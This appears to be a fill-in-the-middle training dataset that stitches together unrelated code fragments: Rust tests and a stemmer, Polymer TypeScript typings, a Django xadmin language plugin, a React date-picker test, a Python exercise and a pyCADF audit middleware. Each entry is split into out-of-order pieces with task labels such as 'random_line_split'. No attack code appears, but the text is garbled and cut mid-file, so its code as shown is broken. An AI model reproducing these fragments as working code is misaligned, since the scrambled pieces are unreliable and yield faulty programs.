Write::write(&mut *self.0.lock().unwrap(), data)
}
fn flush(&mut self) -> io::Result<()> { Ok(()) }
}
let data = Arc::new(Mutex::new(Vec::new()));
let mut ew = EmitterWriter::new(Box::new(Sink(data.clone())), None);
let cm = CodeMap::new();
let content = "abcdefg
koksi
line3
line4
cinq
line6
line7
line8
line9
line10
e-lä-vän
tolv
dreizehn
";
let file = cm.new_filemap("dummy.txt".to_string(), content.to_string());
for (i, b) in content.bytes().enumerate() {
if b == b'\n' {
file.next_line(BytePos(i as u32));
}
}
let start = file.lines.borrow()[7];
let end = file.lines.borrow()[11];
let sp = mk_sp(start, end);
let lvl = Level::Error;
println!("span_to_lines");
let lines = cm.span_to_lines(sp);
println!("highlight_lines");
highlight_lines(&mut ew, &cm, sp, lvl, lines).unwrap();
println!("done");
let vec = data.lock().unwrap().clone();
let vec: &[u8] = &vec;
println!("{}", from_utf8(vec).unwrap());
assert_eq!(vec, "dummy.txt: 8 \n\
dummy.txt: 9 \n\
dummy.txt:10 \n\
dummy.txt:11 \n\
dummy.txt:12 \n".as_bytes());
}
}
| {
let elided_line_num = format!("{}", first_line.line_index + MAX_LINES + 1);
try!(write!(&mut err.dst, "{0:1$} {0:2$} ...\n",
"", fm.name.len(), elided_line_num.len()));
} | conditional_block |
index.d.ts | // Generated by typings
// Source: https://raw.githubusercontent.com/DefinitelyTyped/DefinitelyTyped/a872802c0c84ba98ff207d5e673a1fa867c67fd6/polymer/polymer.d.ts
declare namespace polymer {
type PropConstructorType = StringConstructor|ObjectConstructor|BooleanConstructor|NumberConstructor|DateConstructor|ArrayConstructor;
interface PropObjectType {
type: PropConstructorType;
value?: boolean | number | string | Function | Object;
reflectToAttribute?: boolean;
readOnly?: boolean;
notify?: boolean;
computed?: string;
observer?: string;
}
interface Base {
/** Need to allow all properties for callback methods. */
[prop: string]: any;
/* polymer-micro */
// Attributes
hostAttributes?: {[name:string]:any};
reflectPropertiesToAttribute?(name: string): void;
serializeValueToAttribute?(value: any, attribute: string, node?: Element): void;
deserialize?(value: string, type: NumberConstructor): number;
deserialize?(value: string, type: BooleanConstructor): boolean;
deserialize?(value: string, type: ObjectConstructor): Object;
deserialize?(value: string, type: ArrayConstructor): any[];
deserialize?(value: string, type: DateConstructor): Date;
deserialize?(value: string, type: StringConstructor): string;
serialize?(value: any): string;
// Behaviors
behaviors?:Object[];
// Constructors
factoryImpl?(...args: any[]): void;
// Debouncer
debounce?(jobName: string, callback: Function, wait: number): void;
isDebouncerActive?(jobName: string): boolean;
flushDebouncer?(jobName: string): void;
cancelDebouncer?(jobName: string): void;
// Extends
extends?: string;
getNativePrototype?(tag: string): Object;
// Properties
properties?:{[prop:string]:(PropConstructorType|PropObjectType);};
getPropertyInfo?(property: string): Object;
// Tag
is: string;
/* polymer-mini */
// Ready
ready?(): void;
attachedCallback?(): void;
// Shady
domHost?(): Element;
distributeContent?(): void;
elementMatches?(selector: string, node?: Element): boolean;
// Template {
instanceTemplate?(template: HTMLElement): DocumentFragment;
/* polymer-standard */
// Annotations
$?: any;
// Events
listeners?: {[key:string]:string;};
listen?(node: Element, eventName: string, methodName: string): void;
unlisten?(node: Element, eventName: string, methodName: string): void;
// Gestures
setScrollDirection?(direction: string, node?: HTMLElement): void;
// NotifyPath
notifyPath?(path: string, value: any, fromAbove: any): void;
set?(path: string|(string|number)[], value: any, root?: Object): void;
get?(path: string|(string|number)[], root?: Object): any;
linkPaths?(to: string, from?: string): void;
unlinkPaths?(path: string): void;
push?(path: string, ...item: any[]): number;
pop?(path: string): any;
splice?(path: string, index: number, removeCount: number, ...item: any[]):
number;
shift?(path: string): any;
unshift?(path: string, ...item: any[]): number;
// ResolveUrl
resolveUrl?(url: string): string;
// Styling
scopeSubtree?(container: Element, shouldObserve: boolean): void;
// Utils
$$?(selector: string): Element;
toggleClass?(name: string, bool?: boolean, node?: HTMLElement): void;
toggleAttribute?(name: string, bool?: boolean, node?: HTMLElement): void;
classFollows?(name: string, toElement: HTMLElement, fromElement: HTMLElement): void;
attributeFollows?(name: string, toElement: HTMLElement, fromElement: HTMLElement): void;
getContentChildNodes?(selector: string): Node[];
getContentChildren?(selector: string): HTMLElement[];
fire?(type: string, detail?: any, options?: Object): CustomEvent;
async?(callback: ()=>void, waitTime?: number): number;
cancelAsync?(handle: number): void;
arrayDelete?(path: string|any[], item: any): any[];
transform?(transform: string, node?: HTMLElement): void;
translate3d?(x: number, y: number, z: number, node?: HTMLElement): void;
importHref?(href: string, onload?: Function, onerror?: Function): HTMLLinkElement;
create?(tag: string, props: Object): Element;
isLightDescendant?(node: HTMLElement): boolean;
isLocalDescendant?(node: HTMLElement): boolean
// XStyling
updateStyles?(): void;
/* common api */
registerCallback?():void;
createdCallback?():void;
attachedCallback?():void;
detachedCallback?():void;
attributeChangedCallback?(name: string):void;
extend?(prototype: Object, api: Object):Object;
mixin?(target: Object, source: Object):Object;
copyOwnProperty?(name: string, source: Object, target: Object):void;
observers?: string[];
beforeRegister?(): void;
registered?(): void;
created?(): void;
attached?(): void;
detached?(): void;
attributeChanged?(name: string, oldValue: any, newValue: any): void;
}
interface DomApiStatic {
(obj: Node|Base):DomApi;
(obj: Event):EventApi;
flush():void;
}
interface DomApi {
appendChild(node: Node): Node;
insertBefore(node: Node, refNode?: Node):Node;
removeChild(node: Node):Node;
replaceChild(node: Node, refNode: Node):Node;
getOwnerRoot():Node;
querySelector(selector: string):Node;
querySelectorAll(selector: string):Node[];
getDestinationInsertionPoints():Node[];
getDistributedNodes():Node[];
queryDistributedElements(selector: string):Node[];
setAttribute(name: string, value: any):void;
removeAttribute(name: string):void;
| childNodes:Node[];
children:Element[];
parentNode:Node;
firstChild:Node;
lastChild:Node;
nextSibling:Node;
previousSibling:Node;
firstElementChild:Element;
lastElementChild:Element;
nextElementSibling:Element;
previousElementSibling:Element;
textContent:string;
innerHTML:string;
}
interface EventApi {
rootTarget:EventTarget;
localTarget:EventTarget;
path:Node[];
}
interface Settings {
wantShadow:boolean;
hasShadow:boolean;
nativeShadow:boolean;
useShadow:boolean;
useNativeShadow:boolean;
useNativeImports:boolean;
useNativeCustomElements:boolean;
}
interface PolymerStatic {
Settings: Settings;
dom:DomApiStatic;
(prototype: Base|{new ():Base}):webcomponents.CustomElementConstructor;
Class(prototype: Base|{new ():Base}):webcomponents.CustomElementConstructor;
}
}
declare var Polymer: polymer.PolymerStatic; | random_line_split |
|
stemmer.rs | use std::sync::Arc;
use stemmer;
pub struct StemmerTokenStream<TailTokenStream>
where TailTokenStream: TokenStream {
tail: TailTokenStream,
stemmer: Arc<stemmer::Stemmer>,
}
impl<TailTokenStream> TokenStream for StemmerTokenStream<TailTokenStream>
where TailTokenStream: TokenStream {
fn token(&self) -> &Token {
self.tail.token()
}
fn token_mut(&mut self) -> &mut Token {
self.tail.token_mut()
}
fn advance(&mut self) -> bool {
if self.tail.advance() |
else {
false
}
}
}
impl<TailTokenStream> StemmerTokenStream<TailTokenStream>
where TailTokenStream: TokenStream {
fn wrap(stemmer: Arc<stemmer::Stemmer>, tail: TailTokenStream) -> StemmerTokenStream<TailTokenStream> {
StemmerTokenStream {
tail,
stemmer,
}
}
} | {
// self.tail.token_mut().term.make_ascii_lowercase();
let new_str = self.stemmer.stem_str(&self.token().term);
true
} | conditional_block |
stemmer.rs | use std::sync::Arc;
use stemmer;
pub struct StemmerTokenStream<TailTokenStream>
where TailTokenStream: TokenStream {
tail: TailTokenStream,
stemmer: Arc<stemmer::Stemmer>,
}
impl<TailTokenStream> TokenStream for StemmerTokenStream<TailTokenStream>
where TailTokenStream: TokenStream {
fn token(&self) -> &Token {
self.tail.token()
}
fn token_mut(&mut self) -> &mut Token {
self.tail.token_mut()
}
fn advance(&mut self) -> bool {
if self.tail.advance() {
// self.tail.token_mut().term.make_ascii_lowercase();
let new_str = self.stemmer.stem_str(&self.token().term);
true
}
else {
false
}
}
}
impl<TailTokenStream> StemmerTokenStream<TailTokenStream>
where TailTokenStream: TokenStream {
fn wrap(stemmer: Arc<stemmer::Stemmer>, tail: TailTokenStream) -> StemmerTokenStream<TailTokenStream> {
StemmerTokenStream {
tail,
stemmer,
}
} | } | random_line_split |
|
stemmer.rs | use std::sync::Arc;
use stemmer;
pub struct StemmerTokenStream<TailTokenStream>
where TailTokenStream: TokenStream {
tail: TailTokenStream,
stemmer: Arc<stemmer::Stemmer>,
}
impl<TailTokenStream> TokenStream for StemmerTokenStream<TailTokenStream>
where TailTokenStream: TokenStream {
fn token(&self) -> &Token |
fn token_mut(&mut self) -> &mut Token {
self.tail.token_mut()
}
fn advance(&mut self) -> bool {
if self.tail.advance() {
// self.tail.token_mut().term.make_ascii_lowercase();
let new_str = self.stemmer.stem_str(&self.token().term);
true
}
else {
false
}
}
}
impl<TailTokenStream> StemmerTokenStream<TailTokenStream>
where TailTokenStream: TokenStream {
fn wrap(stemmer: Arc<stemmer::Stemmer>, tail: TailTokenStream) -> StemmerTokenStream<TailTokenStream> {
StemmerTokenStream {
tail,
stemmer,
}
}
} | {
self.tail.token()
} | identifier_body |
stemmer.rs | use std::sync::Arc;
use stemmer;
pub struct | <TailTokenStream>
where TailTokenStream: TokenStream {
tail: TailTokenStream,
stemmer: Arc<stemmer::Stemmer>,
}
impl<TailTokenStream> TokenStream for StemmerTokenStream<TailTokenStream>
where TailTokenStream: TokenStream {
fn token(&self) -> &Token {
self.tail.token()
}
fn token_mut(&mut self) -> &mut Token {
self.tail.token_mut()
}
fn advance(&mut self) -> bool {
if self.tail.advance() {
// self.tail.token_mut().term.make_ascii_lowercase();
let new_str = self.stemmer.stem_str(&self.token().term);
true
}
else {
false
}
}
}
impl<TailTokenStream> StemmerTokenStream<TailTokenStream>
where TailTokenStream: TokenStream {
fn wrap(stemmer: Arc<stemmer::Stemmer>, tail: TailTokenStream) -> StemmerTokenStream<TailTokenStream> {
StemmerTokenStream {
tail,
stemmer,
}
}
} | StemmerTokenStream | identifier_name |
language.py |
from django.conf import settings
from django.template import loader
from django.views.i18n import set_language
from xadmin.plugins.utils import get_context_dict
from xadmin.sites import site
from xadmin.views import BaseAdminPlugin, CommAdminView, BaseAdminView
class SetLangNavPlugin(BaseAdminPlugin):
def block_top_navmenu(self, context, nodes):
context = get_context_dict(context)
context['redirect_to'] = self.request.get_full_path()
nodes.append(loader.render_to_string('xadmin/blocks/comm.top.setlang.html', context=context))
class | (BaseAdminView):
def post(self, request, *args, **kwargs):
if 'nav_menu' in request.session:
del request.session['nav_menu']
return set_language(request)
if settings.LANGUAGES and 'django.middleware.locale.LocaleMiddleware' in settings.MIDDLEWARE_CLASSES:
site.register_plugin(SetLangNavPlugin, CommAdminView)
site.register_view(r'^i18n/setlang/$', SetLangView, 'set_language')
| SetLangView | identifier_name |
language.py |
from django.conf import settings
from django.template import loader
from django.views.i18n import set_language
from xadmin.plugins.utils import get_context_dict
from xadmin.sites import site
from xadmin.views import BaseAdminPlugin, CommAdminView, BaseAdminView
class SetLangNavPlugin(BaseAdminPlugin):
def block_top_navmenu(self, context, nodes):
context = get_context_dict(context)
context['redirect_to'] = self.request.get_full_path()
nodes.append(loader.render_to_string('xadmin/blocks/comm.top.setlang.html', context=context))
class SetLangView(BaseAdminView):
|
if settings.LANGUAGES and 'django.middleware.locale.LocaleMiddleware' in settings.MIDDLEWARE_CLASSES:
site.register_plugin(SetLangNavPlugin, CommAdminView)
site.register_view(r'^i18n/setlang/$', SetLangView, 'set_language')
| def post(self, request, *args, **kwargs):
if 'nav_menu' in request.session:
del request.session['nav_menu']
return set_language(request) | identifier_body |
language.py |
from django.conf import settings
from django.template import loader
from django.views.i18n import set_language
from xadmin.plugins.utils import get_context_dict
from xadmin.sites import site
from xadmin.views import BaseAdminPlugin, CommAdminView, BaseAdminView
class SetLangNavPlugin(BaseAdminPlugin):
def block_top_navmenu(self, context, nodes):
context = get_context_dict(context)
context['redirect_to'] = self.request.get_full_path()
nodes.append(loader.render_to_string('xadmin/blocks/comm.top.setlang.html', context=context))
class SetLangView(BaseAdminView):
def post(self, request, *args, **kwargs):
if 'nav_menu' in request.session:
del request.session['nav_menu']
return set_language(request)
if settings.LANGUAGES and 'django.middleware.locale.LocaleMiddleware' in settings.MIDDLEWARE_CLASSES:
| site.register_plugin(SetLangNavPlugin, CommAdminView)
site.register_view(r'^i18n/setlang/$', SetLangView, 'set_language') | conditional_block |
|
language.py | from django.conf import settings
from django.template import loader
from django.views.i18n import set_language
from xadmin.plugins.utils import get_context_dict
from xadmin.sites import site
from xadmin.views import BaseAdminPlugin, CommAdminView, BaseAdminView
class SetLangNavPlugin(BaseAdminPlugin):
def block_top_navmenu(self, context, nodes): |
def post(self, request, *args, **kwargs):
if 'nav_menu' in request.session:
del request.session['nav_menu']
return set_language(request)
if settings.LANGUAGES and 'django.middleware.locale.LocaleMiddleware' in settings.MIDDLEWARE_CLASSES:
site.register_plugin(SetLangNavPlugin, CommAdminView)
site.register_view(r'^i18n/setlang/$', SetLangView, 'set_language') | context = get_context_dict(context)
context['redirect_to'] = self.request.get_full_path()
nodes.append(loader.render_to_string('xadmin/blocks/comm.top.setlang.html', context=context))
class SetLangView(BaseAdminView): | random_line_split |
user_configuration.ts | ///<reference path="../typings/node/node.d.ts" />
import fs = require('fs');
import path = require("path");
import utils = require('./utils');
var Promise = require("promise");
export class UserConfiguration {
fontColor: string;
fontsize: number;
backgroundColor: string;
fontFamily: string;
constructor(args: any = {}) {
this.defaults();
this.fontsize = args.fontsize || this.fontsize;
this.fontColor = args.fontColor || this.fontColor;
this.backgroundColor = args.backgroundColor || this.backgroundColor;
this.fontFamily = args.fontFamily || this.fontFamily;
}
private defaults() {
this.backgroundColor = "#0B1D2E";
this.fontColor = "#FCFDF2";
this.fontsize = 19;
this.fontFamily = 'courier';
}
}
export function loadConfiguration() {
return readFile(path.join(utils.getUserHome(), ".jstermrc"))
.then((contents) => { return Promise.resolve(JSON.parse(contents)); })
.then((configObj) => {
return Promise.resolve(new UserConfiguration(configObj))
})
.catch((err) => {
console.error(err);
return new UserConfiguration();
})
}
function readFile(filename: string) {
return new Promise(function(resolve, reject) {
fs.readFile(filename, (err,content) => {
if(err) {
return reject(err);
} else |
});
});
}
| {
resolve(content.toString());
} | conditional_block |
user_configuration.ts | ///<reference path="../typings/node/node.d.ts" />
import fs = require('fs');
import path = require("path");
import utils = require('./utils');
var Promise = require("promise");
export class UserConfiguration {
fontColor: string;
fontsize: number;
backgroundColor: string;
fontFamily: string;
constructor(args: any = {}) {
this.defaults();
this.fontsize = args.fontsize || this.fontsize;
this.fontColor = args.fontColor || this.fontColor;
this.backgroundColor = args.backgroundColor || this.backgroundColor;
this.fontFamily = args.fontFamily || this.fontFamily;
}
private defaults() {
this.backgroundColor = "#0B1D2E";
this.fontColor = "#FCFDF2";
this.fontsize = 19;
this.fontFamily = 'courier';
}
}
export function loadConfiguration() {
return readFile(path.join(utils.getUserHome(), ".jstermrc"))
.then((contents) => { return Promise.resolve(JSON.parse(contents)); })
.then((configObj) => {
return Promise.resolve(new UserConfiguration(configObj))
})
.catch((err) => {
console.error(err);
return new UserConfiguration();
}) | function readFile(filename: string) {
return new Promise(function(resolve, reject) {
fs.readFile(filename, (err,content) => {
if(err) {
return reject(err);
} else {
resolve(content.toString());
}
});
});
} | }
| random_line_split |
user_configuration.ts | ///<reference path="../typings/node/node.d.ts" />
import fs = require('fs');
import path = require("path");
import utils = require('./utils');
var Promise = require("promise");
export class | {
fontColor: string;
fontsize: number;
backgroundColor: string;
fontFamily: string;
constructor(args: any = {}) {
this.defaults();
this.fontsize = args.fontsize || this.fontsize;
this.fontColor = args.fontColor || this.fontColor;
this.backgroundColor = args.backgroundColor || this.backgroundColor;
this.fontFamily = args.fontFamily || this.fontFamily;
}
private defaults() {
this.backgroundColor = "#0B1D2E";
this.fontColor = "#FCFDF2";
this.fontsize = 19;
this.fontFamily = 'courier';
}
}
export function loadConfiguration() {
return readFile(path.join(utils.getUserHome(), ".jstermrc"))
.then((contents) => { return Promise.resolve(JSON.parse(contents)); })
.then((configObj) => {
return Promise.resolve(new UserConfiguration(configObj))
})
.catch((err) => {
console.error(err);
return new UserConfiguration();
})
}
function readFile(filename: string) {
return new Promise(function(resolve, reject) {
fs.readFile(filename, (err,content) => {
if(err) {
return reject(err);
} else {
resolve(content.toString());
}
});
});
}
| UserConfiguration | identifier_name |
range-min-max.test.tsx | import React from 'react';
import { render } from '@testing-library/react';
import { clickDay } from 'react-day-picker/test/actions';
import { getAllEnabledDays, getDayButton } from 'react-day-picker/test/po';
import { freezeBeforeAll } from 'react-day-picker/test/utils';
import Example from '@examples/range-min-max';
const today = new Date(2021, 10, 15);
freezeBeforeAll(today);
beforeEach(() => {
render(<Example />);
});
describe('when the first day is clicked', () => {
const fromDay = new Date(2021, 10, 15);
beforeEach(() => clickDay(fromDay));
test('should disable before the allowed range', () => {
expect(getAllEnabledDays()[0]).toHaveTextContent('11th');
});
test('should disable after the allowed range', () => {
const enabledDays = getAllEnabledDays();
expect(enabledDays[enabledDays.length - 1]).toHaveTextContent('19th');
});
describe('when clicking a day after the from date', () => {
const toDay = new Date(2021, 10, 17);
const expectedSelectedDays = [
new Date(2021, 10, 15),
new Date(2021, 10, 16),
new Date(2021, 10, 17)
];
beforeEach(() => clickDay(toDay));
test.each(expectedSelectedDays)('%s should be selected', (day) => {
expect(getDayButton(day)).toHaveAttribute('aria-pressed', 'true');
}); | });
});
describe('when clicking a day before the from date', () => {
const toDay = new Date(2021, 10, 11);
const expectedSelectedDays = [
new Date(2021, 10, 11),
new Date(2021, 10, 12),
new Date(2021, 10, 13),
new Date(2021, 10, 14),
new Date(2021, 10, 15)
];
beforeEach(() => clickDay(toDay));
test.each(expectedSelectedDays)('%s should be selected', (day) => {
expect(getDayButton(day)).toHaveAttribute('aria-pressed', 'true');
});
});
}); | test('should enable the days up to the clicked day', () => {
const enabledDays = getAllEnabledDays();
expect(enabledDays[enabledDays.length - 1]).toHaveTextContent('19th'); | random_line_split |
context.rs | // Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
use language_tags::LanguageTag;
use std::fmt;
use {Args, Message};
/// Contextual configuration data.
#[derive(Clone, Debug)]
pub struct Context {
/// The language being localized for.
pub language_tag: LanguageTag,
/// The value to use in a `PlaceholderFormat`.
pub placeholder_value: Option<i64>,
}
impl Context {
/// Create a new instance of `Context`.
pub fn new(language: LanguageTag, placeholder_value: Option<i64>) -> Self {
Context {
language_tag: language,
placeholder_value: placeholder_value,
}
}
/// Format a message, returning a string.
pub fn | <'f>(&self, message: &Message, args: Option<&Args<'f>>) -> String {
let mut output = String::new();
let _ = message.write_message(self, &mut output, args);
output
}
/// Write a message to a stream.
pub fn write<'f>(
&self,
message: &Message,
stream: &mut fmt::Write,
args: Option<&Args<'f>>,
) -> fmt::Result {
message.write_message(self, stream, args)
}
}
impl Default for Context {
fn default() -> Self {
Context {
language_tag: Default::default(),
placeholder_value: None,
}
}
}
| format | identifier_name |
context.rs | // Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
use language_tags::LanguageTag;
use std::fmt;
use {Args, Message};
/// Contextual configuration data.
#[derive(Clone, Debug)]
pub struct Context {
/// The language being localized for.
pub language_tag: LanguageTag,
/// The value to use in a `PlaceholderFormat`.
pub placeholder_value: Option<i64>,
}
impl Context {
/// Create a new instance of `Context`.
pub fn new(language: LanguageTag, placeholder_value: Option<i64>) -> Self {
Context {
language_tag: language,
placeholder_value: placeholder_value,
}
}
/// Format a message, returning a string.
pub fn format<'f>(&self, message: &Message, args: Option<&Args<'f>>) -> String {
let mut output = String::new();
let _ = message.write_message(self, &mut output, args);
output
}
/// Write a message to a stream.
pub fn write<'f>(
&self,
message: &Message,
stream: &mut fmt::Write,
args: Option<&Args<'f>>,
) -> fmt::Result |
}
impl Default for Context {
fn default() -> Self {
Context {
language_tag: Default::default(),
placeholder_value: None,
}
}
}
| {
message.write_message(self, stream, args)
} | identifier_body |
context.rs | // Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
use language_tags::LanguageTag;
use std::fmt;
use {Args, Message};
/// Contextual configuration data.
#[derive(Clone, Debug)]
pub struct Context {
/// The language being localized for.
pub language_tag: LanguageTag,
/// The value to use in a `PlaceholderFormat`.
pub placeholder_value: Option<i64>,
}
impl Context {
/// Create a new instance of `Context`.
pub fn new(language: LanguageTag, placeholder_value: Option<i64>) -> Self {
Context {
language_tag: language,
placeholder_value: placeholder_value,
}
}
/// Format a message, returning a string.
pub fn format<'f>(&self, message: &Message, args: Option<&Args<'f>>) -> String {
let mut output = String::new();
let _ = message.write_message(self, &mut output, args);
output |
/// Write a message to a stream.
pub fn write<'f>(
&self,
message: &Message,
stream: &mut fmt::Write,
args: Option<&Args<'f>>,
) -> fmt::Result {
message.write_message(self, stream, args)
}
}
impl Default for Context {
fn default() -> Self {
Context {
language_tag: Default::default(),
placeholder_value: None,
}
}
} | } | random_line_split |
ex31.py | print "You enter a dark room with two doors. Do you go through door #1 or door #2?"
door = raw_input("> ")
| print "2. Scream at the bear."
bear = raw_input("> ")
if bear == "1":
print "The bear eats your face off. Good job!"
elif bear == "2":
print "The bear eats your legs off. Good job!"
else:
print "Well, doing %s is probably better. Bear runs away." %bear
elif door =="2":
print "You stare into the endless abyss at Cthulhu's retina."
print "1. Blueberries."
print "2. Yellow jacket clothespins."
print "3. Understanding revolvers yelling melodies."
insanity = raw_input("> ")
if insanity == "1" or insanity =="2":
print "Your body survives powered by a mind of jello. Good job!"
else:
print "The insanity rots your eyes into a pool of muck. Good job!"
else:
print "You stumble around and fall on a knife and die. Good job!" | if door == "1":
print "There`s a giant bear here eating a chees cake. What do you do?"
print "1. Take the cake." | random_line_split |
ex31.py | print "You enter a dark room with two doors. Do you go through door #1 or door #2?"
door = raw_input("> ")
if door == "1":
print "There`s a giant bear here eating a chees cake. What do you do?"
print "1. Take the cake."
print "2. Scream at the bear."
bear = raw_input("> ")
if bear == "1":
|
elif bear == "2":
print "The bear eats your legs off. Good job!"
else:
print "Well, doing %s is probably better. Bear runs away." %bear
elif door =="2":
print "You stare into the endless abyss at Cthulhu's retina."
print "1. Blueberries."
print "2. Yellow jacket clothespins."
print "3. Understanding revolvers yelling melodies."
insanity = raw_input("> ")
if insanity == "1" or insanity =="2":
print "Your body survives powered by a mind of jello. Good job!"
else:
print "The insanity rots your eyes into a pool of muck. Good job!"
else:
print "You stumble around and fall on a knife and die. Good job!" | print "The bear eats your face off. Good job!" | conditional_block |
api.py | # -*- encoding: utf-8 -*-
#
# Copyright 2013 IBM Corp.
#
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ast
import ConfigParser
import os
from oslo.config import cfg
import urlparse
from pycadf import cadftaxonomy as taxonomy
from pycadf import cadftype
from pycadf import credential
from pycadf import endpoint
from pycadf import eventfactory as factory
from pycadf import host
from pycadf import identifier
from pycadf import reason
from pycadf import reporterstep
from pycadf import resource
from pycadf import tag
from pycadf import timestamp
CONF = cfg.CONF
opts = [
cfg.StrOpt('api_audit_map',
default='api_audit_map.conf',
help='File containing mapping for api paths and '
'service endpoints'),
]
CONF.register_opts(opts, group='audit')
class ClientResource(resource.Resource):
def __init__(self, project_id=None, **kwargs):
super(ClientResource, self).__init__(**kwargs)
if project_id is not None:
self.project_id = project_id
class KeystoneCredential(credential.Credential):
def __init__(self, identity_status=None, **kwargs):
super(KeystoneCredential, self).__init__(**kwargs)
if identity_status is not None:
self.identity_status = identity_status
class PycadfAuditApiConfigError(Exception):
"""Error raised when pyCADF fails to configure correctly."""
class OpenStackAuditApi(object):
_API_PATHS = []
_BODY_ACTIONS = {}
_SERVICE_ENDPOINTS = {}
def __init__(self):
self._configure_audit_map()
def _configure_audit_map(self):
"""Configure to recognize and map known api paths."""
cfg_file = CONF.audit.api_audit_map
if not os.path.exists(CONF.audit.api_audit_map):
cfg_file = cfg.CONF.find_file(CONF.audit.api_audit_map)
if cfg_file:
try:
audit_map = ConfigParser.SafeConfigParser()
audit_map.readfp(open(cfg_file))
try:
paths = audit_map.get('DEFAULT', 'api_paths')
self._API_PATHS = paths.lstrip().split('\n')
except ConfigParser.NoSectionError:
pass
try:
self._BODY_ACTIONS = dict(audit_map.items('body_actions'))
except ConfigParser.NoSectionError:
pass
try:
self._SERVICE_ENDPOINTS = \
dict(audit_map.items('service_endpoints'))
except ConfigParser.NoSectionError:
pass
except ConfigParser.ParsingError as err:
raise PycadfAuditApiConfigError(
'Error parsing audit map file: %s' % err)
def _get_action(self, req):
"""Take a given Request, parse url path to calculate action type.
Depending on req.method:
if POST: path ends with action, read the body and get action from map;
request ends with known path, assume is create action;
request ends with unknown path, assume is update action.
if GET: request ends with known path, assume is list action;
request ends with unknown path, assume is read action.
if PUT, assume update action.
if DELETE, assume delete action.
if HEAD, assume read action.
"""
path = urlparse.urlparse(req.url).path
path = path[:-1] if path.endswith('/') else path
method = req.method
if method == 'POST':
if path[path.rfind('/') + 1:] == 'action':
if req.json:
body_action = req.json.keys()[0]
action = self._BODY_ACTIONS.get(body_action,
taxonomy.ACTION_CREATE)
else:
action = taxonomy.ACTION_CREATE
elif path[path.rfind('/') + 1:] not in self._API_PATHS:
action = taxonomy.ACTION_UPDATE
else:
action = taxonomy.ACTION_CREATE
elif method == 'GET':
if path[path.rfind('/') + 1:] in self._API_PATHS:
action = taxonomy.ACTION_LIST | action = taxonomy.ACTION_DELETE
elif method == 'HEAD':
action = taxonomy.ACTION_READ
else:
action = taxonomy.UNKNOWN
return action
def create_event(self, req, correlation_id):
action = self._get_action(req)
initiator_host = host.Host(address=req.client_addr,
agent=req.user_agent)
catalog = ast.literal_eval(req.environ['HTTP_X_SERVICE_CATALOG'])
for endp in catalog:
admin_urlparse = urlparse.urlparse(
endp['endpoints'][0]['adminURL'])
public_urlparse = urlparse.urlparse(
endp['endpoints'][0]['publicURL'])
req_url = urlparse.urlparse(req.host_url)
if (req_url.netloc == admin_urlparse.netloc
or req_url.netloc == public_urlparse.netloc):
service_type = self._SERVICE_ENDPOINTS.get(endp['type'],
taxonomy.UNKNOWN)
service_name = endp['name']
admin_end = endpoint.Endpoint(
name='admin',
url=endp['endpoints'][0]['adminURL'])
private_end = endpoint.Endpoint(
name='private',
url=endp['endpoints'][0]['internalURL'])
public_end = endpoint.Endpoint(
name='public',
url=endp['endpoints'][0]['publicURL'])
service_id = endp['endpoints'][0]['id']
break
else:
service_type = service_id = service_name = taxonomy.UNKNOWN
admin_end = private_end = public_end = None
initiator = ClientResource(
typeURI=taxonomy.ACCOUNT_USER,
id=str(req.environ['HTTP_X_USER_ID']),
name=req.environ['HTTP_X_USER_NAME'],
host=initiator_host,
credential=KeystoneCredential(
token=req.environ['HTTP_X_AUTH_TOKEN'],
identity_status=req.environ['HTTP_X_IDENTITY_STATUS']),
project_id=req.environ['HTTP_X_PROJECT_ID'])
target = resource.Resource(typeURI=service_type,
id=service_id,
name=service_name)
if admin_end:
target.add_address(admin_end)
if private_end:
target.add_address(private_end)
if public_end:
target.add_address(public_end)
event = factory.EventFactory().new_event(
eventType=cadftype.EVENTTYPE_ACTIVITY,
outcome=taxonomy.OUTCOME_PENDING,
action=action,
initiator=initiator,
target=target,
observer='target')
event.add_tag(tag.generate_name_value_tag('correlation_id',
correlation_id))
return event
def append_audit_event(self, req):
"""Append a CADF event to req.environ['CADF_EVENT']
Also, stores model in request for future process and includes a
CADF correlation id.
"""
correlation_id = identifier.generate_uuid()
req.environ['CADF_EVENT_CORRELATION_ID'] = correlation_id
event = self.create_event(req, correlation_id)
setattr(req, 'cadf_model', event)
req.environ['CADF_EVENT'] = event.as_dict()
def mod_audit_event(self, req, response):
"""Modifies CADF event in request based on response.
If no event exists, a new event is created.
"""
if response:
if response.status_int >= 200 and response.status_int < 400:
result = taxonomy.OUTCOME_SUCCESS
else:
result = taxonomy.OUTCOME_FAILURE
else:
result = taxonomy.UNKNOWN
if hasattr(req, 'cadf_model'):
req.cadf_model.add_reporterstep(
reporterstep.Reporterstep(
role=cadftype.REPORTER_ROLE_MODIFIER,
reporter='target',
reporterTime=timestamp.get_utc_now()))
else:
self.append_audit_event(req)
req.cadf_model.outcome = result
if response:
req.cadf_model.reason = \
reason.Reason(reasonType='HTTP',
reasonCode=str(response.status_int))
req.environ['CADF_EVENT'] = req.cadf_model.as_dict() | else:
action = taxonomy.ACTION_READ
elif method == 'PUT':
action = taxonomy.ACTION_UPDATE
elif method == 'DELETE': | random_line_split |
api.py | # -*- encoding: utf-8 -*-
#
# Copyright 2013 IBM Corp.
#
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
